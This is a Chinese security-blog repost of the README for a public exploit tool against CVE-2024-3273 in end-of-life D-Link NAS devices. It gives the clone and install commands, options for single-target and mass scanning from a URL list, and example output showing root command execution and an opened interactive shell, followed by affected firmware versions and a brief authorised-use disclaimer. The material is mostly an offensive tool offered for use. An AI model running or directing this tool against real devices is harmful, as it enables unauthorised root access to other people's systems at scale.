D-Link NAS CVE-2024-3273漏洞利用工具

admin 2024年4月19日16:59:48评论6 views字数 1077阅读3分35秒阅读模式
 

🌟简介

D-Link NAS CVE-2024-3273漏洞利用工具

该脚本是针对特定版本的 D-Link NAS 设备中发现的 CVE-2024-3273 漏洞的强大利用工具。它可以执行命令并允许对受影响的设备进行未经授权的访问。

⚙️安装

要设置漏洞利用工具,请按照下列步骤操作:

  1. 克隆存储库:
git clone https://github.com/Chocapikk/CVE-2024-3273.git
  1. 导航到该工具的目录:
cd CVE-2024-3273
  1. 安装所需的 Python 包:
pip install -r requirements.txt

🚀 用法

要使用该工具,请从命令行运行脚本,如下所示:

python exploit.py [options]

选项

  • -u, --url : 指定目标 URL 或 IP 地址。

  • -f, --file:指定包含要扫描的 URL 列表的文件。

  • -t, --threads : 设置并发扫描的线程数。

  • -o, --output:定义输出文件以保存扫描结果。

当选项提供单个 URL-u并且目标易受攻击时,脚本将尝试打开交互式 shell。

例子

$ python3 exploit.py -u http://127.0.0.1
[+] Command executed successfully.
[!] http://127.0.0.1 is vulnerable to CVE-2024-3273: uid=0(root) gid=0(root)
[+] Opening interactive shell...
$ id
[+] Command executed successfully.
uid=0(root) gid=0(root)

📊 大规模扫描

对于批量扫描,请将该-f选项与包含 URL 的文件结合使用。该工具将扫描每个 URL 并打印简洁的结果,表明每个目标是否容易受到攻击。

python exploit.py -f urls.txt

🗒️ 受影响的版本

该漏洞影响以下版本的 D-Link NAS 设备:

  • DNS-320L 版本 1.11、版本 1.03.0904.2013、版本 1.01.0702.2013
  • DNS-325 版本 1.01
  • DNS-327L 版本 1.09,版本 1.00.0409.2013
  • DNS-340L 版本 1.08

这些系统被认为是生命周期终止 (EOL),这意味着它们不再受到制造商的支持或接收更新。强烈建议不再使用这些系统。

🛡️免责声明

以负责任且合乎道德的方式使用此工具。在测试任何系统的漏洞之前,请务必获得适当的授权。

项目地址

https://github.com/Chocapikk/CVE-2024-3273

原文始发于微信公众号(SecHub网络安全社区):D-Link NAS CVE-2024-3273漏洞利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日16:59:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-Link NAS CVE-2024-3273漏洞利用工具http://cn-sec.com/archives/2673007.html

发表评论

匿名网友 填写信息